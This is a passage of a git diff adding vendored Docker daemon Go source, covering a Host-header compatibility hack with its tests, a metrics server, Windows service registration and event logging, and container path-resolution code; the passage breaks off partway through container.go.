+++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go
@@ -0,0 +1,18 @@
+package main
+
+import (
+	"sync/atomic"
+
+	_ "github.com/docker/docker/autogen/winresources/dockerd"
+)
+
+//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll"
+
+var dummy uintptr
+
+func init() {
+	// Ensure that this import is not removed by the linker. This is used to
+	// ensure that shell32.dll is loaded by the system loader, preventing
+	// go#15286 from triggering on Nano Server TP5.
+	atomic.LoadUintptr(&dummy)
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go
new file mode 100644
index 0000000000..d4aa3ddd73
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go
@@ -0,0 +1,121 @@
+// +build !windows
+
+package hack
+
+import "net"
+
+// MalformedHostHeaderOverride is a wrapper to be able
+// to overcome the 400 Bad request coming from old docker
+// clients that send an invalid Host header.
+type MalformedHostHeaderOverride struct {
+	net.Listener
+}
+
+// MalformedHostHeaderOverrideConn wraps the underlying unix
+// connection and keeps track of the first read from http.Server
+// which just reads the headers.
+type MalformedHostHeaderOverrideConn struct {
+	net.Conn
+	first bool
+}
+
+var closeConnHeader = []byte("\r\nConnection: close\r")
+
+// Read reads the first *read* request from http.Server to inspect
+// the Host header. If the Host starts with / then we're talking to
+// an old docker client which send an invalid Host header. To not
+// error out in http.Server we rewrite the first bytes of the request
+// to sanitize the Host header itself.
+// In case we're not dealing with old docker clients the data is just passed
+// to the server w/o modification.
+func (l *MalformedHostHeaderOverrideConn) Read(b []byte) (n int, err error) {
+	// http.Server uses a 4k buffer
+	if l.first && len(b) == 4096 {
+		// This keeps track of the first read from http.Server which just reads
+		// the headers
+		l.first = false
+		// The first read of the connection by http.Server is done limited to
+		// DefaultMaxHeaderBytes (usually 1 << 20) + 4096.
+		// Here we do the first read which gets us all the http headers to
+		// be inspected and modified below.
+		c, err := l.Conn.Read(b)
+		if err != nil {
+			return c, err
+		}
+
+		var (
+			start, end    int
+			firstLineFeed = -1
+			buf           []byte
+		)
+		for i := 0; i <= c-1-7; i++ {
+			if b[i] == '\n' && firstLineFeed == -1 {
+				firstLineFeed = i
+			}
+			if b[i] != '\n' {
+				continue
+			}
+
+			if b[i+1] == '\r' && b[i+2] == '\n' {
+				return c, nil
+			}
+
+			if b[i+1] != 'H' {
+				continue
+			}
+			if b[i+2] != 'o' {
+				continue
+			}
+			if b[i+3] != 's' {
+				continue
+			}
+			if b[i+4] != 't' {
+				continue
+			}
+			if b[i+5] != ':' {
+				continue
+			}
+			if b[i+6] != ' ' {
+				continue
+			}
+			if b[i+7] != '/' {
+				continue
+			}
+			// ensure clients other than the docker clients do not get this hack
+			if i != firstLineFeed {
+				return c, nil
+			}
+			start = i + 7
+			// now find where the value ends
+			for ii, bbb := range b[start:c] {
+				if bbb == '\n' {
+					end = start + ii
+					break
+				}
+			}
+			buf = make([]byte, 0, c+len(closeConnHeader)-(end-start))
+			// strip the value of the host header and
+			// inject `Connection: close` to ensure we don't reuse this connection
+			buf = append(buf, b[:start]...)
+			buf = append(buf, closeConnHeader...)
+			buf = append(buf, b[end:c]...)
+			copy(b, buf)
+			break
+		}
+		if len(buf) == 0 {
+			return c, nil
+		}
+		return len(buf), nil
+	}
+	return l.Conn.Read(b)
+}
+
+// Accept makes the listener accepts connections and wraps the connection
+// in a MalformedHostHeaderOverrideConn initilizing first to true.
+func (l *MalformedHostHeaderOverride) Accept() (net.Conn, error) {
+	c, err := l.Listener.Accept()
+	if err != nil {
+		return c, err
+	}
+	return &MalformedHostHeaderOverrideConn{c, true}, nil
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go
new file mode 100644
index 0000000000..1a0a60baf3
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go
@@ -0,0 +1,124 @@
+// +build !windows
+
+package hack
+
+import (
+	"bytes"
+	"io"
+	"net"
+	"strings"
+	"testing"
+)
+
+type bufConn struct {
+	net.Conn
+	buf *bytes.Buffer
+}
+
+func (bc *bufConn) Read(b []byte) (int, error) {
+	return bc.buf.Read(b)
+}
+
+func TestHeaderOverrideHack(t *testing.T) {
+	tests := [][2][]byte{
+		{
+			[]byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"),
+			[]byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\n"),
+		},
+		{
+			[]byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\nFoo: Bar\r\n"),
+			[]byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\nFoo: Bar\r\n"),
+		},
+		{
+			[]byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\ntest something!"),
+			[]byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\ntest something!"),
+		},
+		{
+			[]byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\ntest something! " + strings.Repeat("test", 15000)),
+			[]byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\ntest something! " + strings.Repeat("test", 15000)),
+		},
+		{
+			[]byte("GET /foo\nFoo: Bar\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"),
+			[]byte("GET /foo\nFoo: Bar\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"),
+		},
+	}
+
+	// Test for https://github.com/docker/docker/issues/23045
+	h0 := "GET /foo\nUser-Agent: Docker\r\n\r\n"
+	h0 = h0 + strings.Repeat("a", 4096-len(h0)-1) + "\n"
+	tests = append(tests, [2][]byte{[]byte(h0), []byte(h0)})
+
+	for _, pair := range tests {
+		read := make([]byte, 4096)
+		client := &bufConn{
+			buf: bytes.NewBuffer(pair[0]),
+		}
+		l := MalformedHostHeaderOverrideConn{client, true}
+
+		n, err := l.Read(read)
+		if err != nil && err != io.EOF {
+			t.Fatalf("read: %d - %d, err: %v\n%s", n, len(pair[0]), err, string(read[:n]))
+		}
+		if !bytes.Equal(read[:n], pair[1][:n]) {
+			t.Fatalf("\n%s\n%s\n", read[:n], pair[1][:n])
+		}
+	}
+}
+
+func BenchmarkWithHack(b *testing.B) {
+	client, srv := net.Pipe()
+	done := make(chan struct{})
+	req := []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\n")
+	read := make([]byte, 4096)
+	b.SetBytes(int64(len(req) * 30))
+
+	l := MalformedHostHeaderOverrideConn{client, true}
+	go func() {
+		for {
+			if _, err := srv.Write(req); err != nil {
+				srv.Close()
+				break
+			}
+			l.first = true // make sure each subsequent run uses the hack parsing
+		}
+		close(done)
+	}()
+
+	for i := 0; i < b.N; i++ {
+		for i := 0; i < 30; i++ {
+			if n, err := l.Read(read); err != nil && err != io.EOF {
+				b.Fatalf("read: %d - %d, err: %v\n%s", n, len(req), err, string(read[:n]))
+			}
+		}
+	}
+	l.Close()
+	<-done
+}
+
+func BenchmarkNoHack(b *testing.B) {
+	client, srv := net.Pipe()
+	done := make(chan struct{})
+	req := []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\n")
+	read := make([]byte, 4096)
+	b.SetBytes(int64(len(req) * 30))
+
+	go func() {
+		for {
+			if _, err := srv.Write(req); err != nil {
+				srv.Close()
+				break
+			}
+		}
+		close(done)
+	}()
+
+	for i := 0; i < b.N; i++ {
+		for i := 0; i < 30; i++ {
+			if _, err := client.Read(read); err != nil && err != io.EOF {
+				b.Fatal(err)
+			}
+		}
+	}
+	client.Close()
+	<-done
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go
new file mode 100644
index 0000000000..0c8860408b
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go
@@ -0,0 +1,27 @@
+package main
+
+import (
+	"net"
+	"net/http"
+
+	"github.com/Sirupsen/logrus"
+	metrics "github.com/docker/go-metrics"
+)
+
+func startMetricsServer(addr string) error {
+	if err := allocateDaemonPort(addr); err != nil {
+		return err
+	}
+	l, err := net.Listen("tcp", addr)
+	if err != nil {
+		return err
+	}
+	mux := http.NewServeMux()
+	mux.Handle("/metrics", metrics.Handler())
+	go func() {
+		if err := http.Serve(l, mux); err != nil {
+			logrus.Errorf("serve metrics api: %s", err)
+		}
+	}()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go
new file mode 100644
index 0000000000..64ad7fcaa0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go
@@ -0,0 +1,14 @@
+// +build !windows
+
+package main
+
+import (
+	"github.com/spf13/pflag"
+)
+
+func initService(daemonCli *DaemonCli) (bool, error) {
+	return false, nil
+}
+
+func installServiceFlags(flags *pflag.FlagSet) {
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go
new file mode 100644
index 0000000000..dd37abcf3c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go
@@ -0,0 +1,426 @@
+package main
+
+import (
+	"bytes"
+	"errors"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"syscall"
+	"time"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/system"
+	"github.com/spf13/pflag"
+	"golang.org/x/sys/windows"
+	"golang.org/x/sys/windows/svc"
+	"golang.org/x/sys/windows/svc/debug"
+	"golang.org/x/sys/windows/svc/eventlog"
+	"golang.org/x/sys/windows/svc/mgr"
+)
+
+var (
+	flServiceName       *string
+	flRegisterService   *bool
+	flUnregisterService *bool
+	flRunService        *bool
+
+	setStdHandle = windows.NewLazySystemDLL("kernel32.dll").NewProc("SetStdHandle")
+	oldStderr    syscall.Handle
+	panicFile    *os.File
+
+	service *handler
+)
+
+const (
+	// These should match the values in event_messages.mc.
+	eventInfo  = 1
+	eventWarn  = 1
+	eventError = 1
+	eventDebug = 2
+	eventPanic = 3
+	eventFatal = 4
+
+	eventExtraOffset = 10 // Add this to any event to get a string that supports extended data
+)
+
+func installServiceFlags(flags *pflag.FlagSet) {
+	flServiceName = flags.String("service-name", "docker", "Set the Windows service name")
+	flRegisterService = flags.Bool("register-service", false, "Register the service and exit")
+	flUnregisterService = flags.Bool("unregister-service", false, "Unregister the service and exit")
+	flRunService = flags.Bool("run-service", false, "")
+	flags.MarkHidden("run-service")
+}
+
+type handler struct {
+	tosvc     chan bool
+	fromsvc   chan error
+	daemonCli *DaemonCli
+}
+
+type etwHook struct {
+	log *eventlog.Log
+}
+
+func (h *etwHook) Levels() []logrus.Level {
+	return []logrus.Level{
+		logrus.PanicLevel,
+		logrus.FatalLevel,
+		logrus.ErrorLevel,
+		logrus.WarnLevel,
+		logrus.InfoLevel,
+		logrus.DebugLevel,
+	}
+}
+
+func (h *etwHook) Fire(e *logrus.Entry) error {
+	var (
+		etype uint16
+		eid   uint32
+	)
+
+	switch e.Level {
+	case logrus.PanicLevel:
+		etype = windows.EVENTLOG_ERROR_TYPE
+		eid = eventPanic
+	case logrus.FatalLevel:
+		etype = windows.EVENTLOG_ERROR_TYPE
+		eid = eventFatal
+	case logrus.ErrorLevel:
+		etype = windows.EVENTLOG_ERROR_TYPE
+		eid = eventError
+	case logrus.WarnLevel:
+		etype = windows.EVENTLOG_WARNING_TYPE
+		eid = eventWarn
+	case logrus.InfoLevel:
+		etype = windows.EVENTLOG_INFORMATION_TYPE
+		eid = eventInfo
+	case logrus.DebugLevel:
+		etype = windows.EVENTLOG_INFORMATION_TYPE
+		eid = eventDebug
+	default:
+		return errors.New("unknown level")
+	}
+
+	// If there is additional data, include it as a second string.
+	exts := ""
+	if len(e.Data) > 0 {
+		fs := bytes.Buffer{}
+		for k, v := range e.Data {
+			fs.WriteString(k)
+			fs.WriteByte('=')
+			fmt.Fprint(&fs, v)
+			fs.WriteByte(' ')
+		}
+
+		exts = fs.String()[:fs.Len()-1]
+		eid += eventExtraOffset
+	}
+
+	if h.log == nil {
+		fmt.Fprintf(os.Stderr, "%s [%s]\n", e.Message, exts)
+		return nil
+	}
+
+	var (
+		ss  [2]*uint16
+		err error
+	)
+
+	ss[0], err = syscall.UTF16PtrFromString(e.Message)
+	if err != nil {
+		return err
+	}
+
+	count := uint16(1)
+	if exts != "" {
+		ss[1], err = syscall.UTF16PtrFromString(exts)
+		if err != nil {
+			return err
+		}
+
+		count++
+	}
+
+	return windows.ReportEvent(h.log.Handle, etype, 0, eid, 0, count, 0, &ss[0], nil)
+}
+
+func getServicePath() (string, error) {
+	p, err := exec.LookPath(os.Args[0])
+	if err != nil {
+		return "", err
+	}
+	return filepath.Abs(p)
+}
+
+func registerService() error {
+	p, err := getServicePath()
+	if err != nil {
+		return err
+	}
+	m, err := mgr.Connect()
+	if err != nil {
+		return err
+	}
+	defer m.Disconnect()
+
+	depends := []string{}
+
+	// This dependency is required on build 14393 (RS1)
+	// it is added to the platform in newer builds
+	if system.GetOSVersion().Build == 14393 {
+		depends = append(depends, "ConDrv")
+	}
+
+	c := mgr.Config{
+		ServiceType:  windows.SERVICE_WIN32_OWN_PROCESS,
+		StartType:    mgr.StartAutomatic,
+		ErrorControl: mgr.ErrorNormal,
+		Dependencies: depends,
+		DisplayName:  "Docker Engine",
+	}
+
+	// Configure the service to launch with the arguments that were just passed.
+	args := []string{"--run-service"}
+	for _, a := range os.Args[1:] {
+		if a != "--register-service" && a != "--unregister-service" {
+			args = append(args, a)
+		}
+	}
+
+	s, err := m.CreateService(*flServiceName, p, c, args...)
+	if err != nil {
+		return err
+	}
+	defer s.Close()
+
+	// See http://stackoverflow.com/questions/35151052/how-do-i-configure-failure-actions-of-a-windows-service-written-in-go
+	const (
+		scActionNone       = 0
+		scActionRestart    = 1
+		scActionReboot     = 2
+		scActionRunCommand = 3
+
+		serviceConfigFailureActions = 2
+	)
+
+	type serviceFailureActions struct {
+		ResetPeriod  uint32
+		RebootMsg    *uint16
+		Command      *uint16
+		ActionsCount uint32
+		Actions      uintptr
+	}
+
+	type scAction struct {
+		Type  uint32
+		Delay uint32
+	}
+	t := []scAction{
+		{Type: scActionRestart, Delay: uint32(60 * time.Second / time.Millisecond)},
+		{Type: scActionRestart, Delay: uint32(60 * time.Second / time.Millisecond)},
+		{Type: scActionNone},
+	}
+	lpInfo := serviceFailureActions{ResetPeriod: uint32(24 * time.Hour / time.Second), ActionsCount: uint32(3), Actions: uintptr(unsafe.Pointer(&t[0]))}
+	err = windows.ChangeServiceConfig2(s.Handle, serviceConfigFailureActions, (*byte)(unsafe.Pointer(&lpInfo)))
+	if err != nil {
+		return err
+	}
+
+	err = eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error)
+	if err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func unregisterService() error {
+	m, err := mgr.Connect()
+	if err != nil {
+		return err
+	}
+	defer m.Disconnect()
+
+	s, err := m.OpenService(*flServiceName)
+	if err != nil {
+		return err
+	}
+	defer s.Close()
+
+	eventlog.Remove(*flServiceName)
+	err = s.Delete()
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+func initService(daemonCli *DaemonCli) (bool, error) {
+	if *flUnregisterService {
+		if *flRegisterService {
+			return true, errors.New("--register-service and --unregister-service cannot be used together")
+		}
+		return true, unregisterService()
+	}
+
+	if *flRegisterService {
+		return true, registerService()
+	}
+
+	if !*flRunService {
+		return false, nil
+	}
+
+	interactive, err := svc.IsAnInteractiveSession()
+	if err != nil {
+		return false, err
+	}
+
+	h := &handler{
+		tosvc:     make(chan bool),
+		fromsvc:   make(chan error),
+		daemonCli: daemonCli,
+	}
+
+	var log *eventlog.Log
+	if !interactive {
+		log, err = eventlog.Open(*flServiceName)
+		if err != nil {
+			return false, err
+		}
+	}
+
+	logrus.AddHook(&etwHook{log})
+	logrus.SetOutput(ioutil.Discard)
+
+	service = h
+	go func() {
+		if interactive {
+			err = debug.Run(*flServiceName, h)
+		} else {
+			err = svc.Run(*flServiceName, h)
+		}
+
+		h.fromsvc <- err
+	}()
+
+	// Wait for the first signal from the service handler.
+	err = <-h.fromsvc
+	if err != nil {
+		return false, err
+	}
+	return false, nil
+}
+
+func (h *handler) started() error {
+	// This must be delayed until daemonCli initializes Config.Root
+	err := initPanicFile(filepath.Join(h.daemonCli.Config.Root, "panic.log"))
+	if err != nil {
+		return err
+	}
+
+	h.tosvc <- false
+	return nil
+}
+
+func (h *handler) stopped(err error) {
+	logrus.Debugf("Stopping service: %v", err)
+	h.tosvc <- err != nil
+	<-h.fromsvc
+}
+
+func (h *handler) Execute(_ []string, r <-chan svc.ChangeRequest, s chan<- svc.Status) (bool, uint32) {
+	s <- svc.Status{State: svc.StartPending, Accepts: 0}
+	// Unblock initService()
+	h.fromsvc <- nil
+
+	// Wait for initialization to complete.
+	failed := <-h.tosvc
+	if failed {
+		logrus.Debug("Aborting service start due to failure during initialization")
+		return true, 1
+	}
+
+	s <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown | svc.Accepted(windows.SERVICE_ACCEPT_PARAMCHANGE)}
+	logrus.Debug("Service running")
+Loop:
+	for {
+		select {
+		case failed = <-h.tosvc:
+			break Loop
+		case c := <-r:
+			switch c.Cmd {
+			case svc.Cmd(windows.SERVICE_CONTROL_PARAMCHANGE):
+				h.daemonCli.reloadConfig()
+			case svc.Interrogate:
+				s <- c.CurrentStatus
+			case svc.Stop, svc.Shutdown:
+				s <- svc.Status{State: svc.StopPending, Accepts: 0}
+				h.daemonCli.stop()
+			}
+		}
+	}
+
+	removePanicFile()
+	if failed {
+		return true, 1
+	}
+	return false, 0
+}
+
+func initPanicFile(path string) error {
+	var err error
+	panicFile, err = os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0)
+	if err != nil {
+		return err
+	}
+
+	st, err := panicFile.Stat()
+	if err != nil {
+		return err
+	}
+
+	// If there are contents in the file already, move the file out of the way
+	// and replace it.
+	if st.Size() > 0 {
+		panicFile.Close()
+		os.Rename(path, path+".old")
+		panicFile, err = os.Create(path)
+		if err != nil {
+			return err
+		}
+	}
+
+	// Update STD_ERROR_HANDLE to point to the panic file so that Go writes to
+	// it when it panics. Remember the old stderr to restore it before removing
+	// the panic file.
+	sh := syscall.STD_ERROR_HANDLE
+	h, err := syscall.GetStdHandle(sh)
+	if err != nil {
+		return err
+	}
+
+	oldStderr = h
+
+	r, _, err := setStdHandle.Call(uintptr(sh), uintptr(panicFile.Fd()))
+	if r == 0 && err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func removePanicFile() {
+	if st, err := panicFile.Stat(); err == nil {
+		if st.Size() == 0 {
+			sh := syscall.STD_ERROR_HANDLE
+			setStdHandle.Call(uintptr(sh), uintptr(oldStderr))
+			panicFile.Close()
+			os.Remove(panicFile.Name())
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/container/archive.go b/vendor/github.com/docker/docker/container/archive.go
new file mode 100644
index 0000000000..56e6598b9c
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/archive.go
@@ -0,0 +1,76 @@
+package container
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/system"
+)
+
+// ResolvePath resolves the given path in the container to a resource on the
+// host. Returns a resolved path (absolute path to the resource on the host),
+// the absolute path to the resource relative to the container's rootfs, and
+// an error if the path points to outside the container's rootfs.
+func (container *Container) ResolvePath(path string) (resolvedPath, absPath string, err error) {
+	// Check if a drive letter supplied, it must be the system drive. No-op except on Windows
+	path, err = system.CheckSystemDriveAndRemoveDriveLetter(path)
+	if err != nil {
+		return "", "", err
+	}
+
+	// Consider the given path as an absolute path in the container.
+	absPath = archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path)
+
+	// Split the absPath into its Directory and Base components. We will
+	// resolve the dir in the scope of the container then append the base.
+	dirPath, basePath := filepath.Split(absPath)
+
+	resolvedDirPath, err := container.GetResourcePath(dirPath)
+	if err != nil {
+		return "", "", err
+	}
+
+	// resolvedDirPath will have been cleaned (no trailing path separators) so
+	// we can manually join it with the base path element.
+	resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath
+
+	return resolvedPath, absPath, nil
+}
+
+// StatPath is the unexported version of StatPath. Locks and mounts should
+// be acquired before calling this method and the given path should be fully
+// resolved to a path on the host corresponding to the given absolute path
+// inside the container.
+func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.ContainerPathStat, err error) {
+	lstat, err := os.Lstat(resolvedPath)
+	if err != nil {
+		return nil, err
+	}
+
+	var linkTarget string
+	if lstat.Mode()&os.ModeSymlink != 0 {
+		// Fully evaluate the symlink in the scope of the container rootfs.
+		hostPath, err := container.GetResourcePath(absPath)
+		if err != nil {
+			return nil, err
+		}
+
+		linkTarget, err = filepath.Rel(container.BaseFS, hostPath)
+		if err != nil {
+			return nil, err
+		}
+
+		// Make it an absolute path.
+		linkTarget = filepath.Join(string(filepath.Separator), linkTarget)
+	}
+
+	return &types.ContainerPathStat{
+		Name:       filepath.Base(absPath),
+		Size:       lstat.Size(),
+		Mode:       lstat.Mode(),
+		Mtime:      lstat.ModTime(),
+		LinkTarget: linkTarget,
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/container/container.go b/vendor/github.com/docker/docker/container/container.go
new file mode 100644
index 0000000000..fc4fe2717f
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/container.go
@@ -0,0 +1,1103 @@
+package container
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"net"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	containertypes "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	networktypes "github.com/docker/docker/api/types/network"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/container/stream"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/docker/docker/daemon/logger"
+	"github.com/docker/docker/daemon/logger/jsonfilelog"
+	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/promise"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/restartmanager"
+	"github.com/docker/docker/runconfig"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/docker/volume"
+	"github.com/docker/go-connections/nat"
+	"github.com/docker/libnetwork"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/docker/libnetwork/options"
+	"github.com/docker/libnetwork/types"
+	agentexec "github.com/docker/swarmkit/agent/exec"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+const configFileName = "config.v2.json"
+
+const (
+	// DefaultStopTimeout is the timeout (in seconds) for the syscall signal used to stop a container.
+	DefaultStopTimeout = 10
+)
+
+var (
+	errInvalidEndpoint = fmt.Errorf("invalid endpoint while building port map info")
+	errInvalidNetwork  = fmt.Errorf("invalid network settings while building port map info")
+)
+
+// DetachError is special error which returned in case of container detach.
+type DetachError struct{}
+
+func (DetachError) Error() string {
+	return "detached from container"
+}
+
+// CommonContainer holds the fields for a container which are
+// applicable across all platforms supported by the daemon.
+type CommonContainer struct {
+	StreamConfig *stream.Config
+	// embed for Container to support states directly.
+	*State          `json:"State"` // Needed for Engine API version <= 1.11
+	Root            string         `json:"-"` // Path to the "home" of the container, including metadata.
+	BaseFS          string         `json:"-"` // Path to the graphdriver mountpoint
+	RWLayer         layer.RWLayer  `json:"-"`
+	ID              string
+	Created         time.Time
+	Managed         bool
+	Path            string
+	Args            []string
+	Config          *containertypes.Config
+	ImageID         image.ID `json:"Image"`
+	NetworkSettings *network.Settings
+	LogPath         string
+	Name            string
+	Driver          string
+	// MountLabel contains the options for the 'mount' command
+	MountLabel             string
+	ProcessLabel           string
+	RestartCount           int
+	HasBeenStartedBefore   bool
+	HasBeenManuallyStopped bool // used for unless-stopped restart policy
+	MountPoints            map[string]*volume.MountPoint
+	HostConfig             *containertypes.HostConfig `json:"-"` // do not serialize the host config in the json, otherwise we'll make the container unportable
+	ExecCommands           *exec.Store                `json:"-"`
+	SecretStore            agentexec.SecretGetter     `json:"-"`
+	SecretReferences       []*swarmtypes.SecretReference
+	// logDriver for closing
+	LogDriver      logger.Logger  `json:"-"`
+	LogCopier      *logger.Copier `json:"-"`
+	restartManager restartmanager.RestartManager
+	attachContext  *attachContext
+}
+
+// NewBaseContainer creates a new container with its
+// basic configuration.
+func NewBaseContainer(id, root string) *Container {
+	return &Container{
+		CommonContainer: CommonContainer{
+			ID:            id,
+			State:         NewState(),
+			ExecCommands:  exec.NewStore(),
+			Root:          root,
+			MountPoints:   make(map[string]*volume.MountPoint),
+			StreamConfig:  stream.NewConfig(),
+			attachContext: &attachContext{},
+		},
+	}
+}
+
+// FromDisk loads the container configuration stored in the host.
+func (container *Container) FromDisk() error {
+	pth, err := container.ConfigPath()
+	if err != nil {
+		return err
+	}
+
+	jsonSource, err := os.Open(pth)
+	if err != nil {
+		return err
+	}
+	defer jsonSource.Close()
+
+	dec := json.NewDecoder(jsonSource)
+
+	// Load container settings
+	if err := dec.Decode(container); err != nil {
+		return err
+	}
+
+	if err := label.ReserveLabel(container.ProcessLabel); err != nil {
+		return err
+	}
+	return container.readHostConfig()
+}
+
+// ToDisk saves the container configuration on disk.
+func (container *Container) ToDisk() error {
+	pth, err := container.ConfigPath()
+	if err != nil {
+		return err
+	}
+
+	jsonSource, err := ioutils.NewAtomicFileWriter(pth, 0644)
+	if err != nil {
+		return err
+	}
+	defer jsonSource.Close()
+
+	enc := json.NewEncoder(jsonSource)
+
+	// Save container settings
+	if err := enc.Encode(container); err != nil {
+		return err
+	}
+
+	return container.WriteHostConfig()
+}
+
+// ToDiskLocking saves the container configuration on disk in a thread safe way.
+func (container *Container) ToDiskLocking() error {
+	container.Lock()
+	err := container.ToDisk()
+	container.Unlock()
+	return err
+}
+
+// readHostConfig reads the host configuration from disk for the container.
+func (container *Container) readHostConfig() error {
+	container.HostConfig = &containertypes.HostConfig{}
+	// If the hostconfig file does not exist, do not read it.
+	// (We still have to initialize container.HostConfig,
+	// but that's OK, since we just did that above.)
+	pth, err := container.HostConfigPath()
+	if err != nil {
+		return err
+	}
+
+	f, err := os.Open(pth)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+	defer f.Close()
+
+	if err := json.NewDecoder(f).Decode(&container.HostConfig); err != nil {
+		return err
+	}
+
+	container.InitDNSHostConfig()
+
+	return nil
+}
+
+// WriteHostConfig saves the host configuration on disk for the container.
+func (container *Container) WriteHostConfig() error {
+	pth, err := container.HostConfigPath()
+	if err != nil {
+		return err
+	}
+
+	f, err := ioutils.NewAtomicFileWriter(pth, 0644)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	return json.NewEncoder(f).Encode(&container.HostConfig)
+}
+
+// SetupWorkingDirectory sets up the container's working directory as set in container.Config.WorkingDir
+func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error {
+	if container.Config.WorkingDir == "" {
+		return nil
+	}
+
+	container.Config.WorkingDir = filepath.Clean(container.Config.WorkingDir)
+
+	pth, err := container.GetResourcePath(container.Config.WorkingDir)
+	if err != nil {
+		return err
+	}
+
+	if err := idtools.MkdirAllNewAs(pth, 0755, rootUID, rootGID); err != nil {
+		pthInfo, err2 := os.Stat(pth)
+		if err2 == nil && pthInfo != nil && !pthInfo.IsDir() {
+			return fmt.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir)
+		}
+
+		return err
+	}
+
+	return nil
+}
+
+// GetResourcePath evaluates `path` in the scope of the container's BaseFS, with proper path
+// sanitisation. Symlinks are all scoped to the BaseFS of the container, as
+// though the container's BaseFS was `/`.
+//
+// The BaseFS of a container is the host-facing path which is bind-mounted as
+// `/` inside the container. This method is essentially used to access a
+// particular path inside the container as though you were a process in that
+// container.
+//
+// NOTE: The returned path is *only* safely scoped inside the container's BaseFS
+//       if no component of the returned path changes (such as a component
+//       symlinking to a different path) between using this method and using the
+//       path. See symlink.FollowSymlinkInScope for more details.
+func (container *Container) GetResourcePath(path string) (string, error) {
+	// IMPORTANT - These are paths on the OS where the daemon is running, hence
+	// any filepath operations must be done in an OS agnostic way.
+
+	cleanPath := cleanResourcePath(path)
+	r, e := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, cleanPath), container.BaseFS)
+
+	// Log this here on the daemon side as there's otherwise no indication apart
+	// from the error being propagated all the way back to the client. This makes
+	// debugging significantly easier and clearly indicates the error comes from the daemon.
+	if e != nil {
+		logrus.Errorf("Failed to FollowSymlinkInScope BaseFS %s cleanPath %s path %s %s\n", container.BaseFS, cleanPath, path, e)
+	}
+	return r, e
+}
+
+// GetRootResourcePath evaluates `path` in the scope of the container's root, with proper path
+// sanitisation. Symlinks are all scoped to the root of the container, as
+// though the container's root was `/`.
+//
+// The root of a container is the host-facing configuration metadata directory.
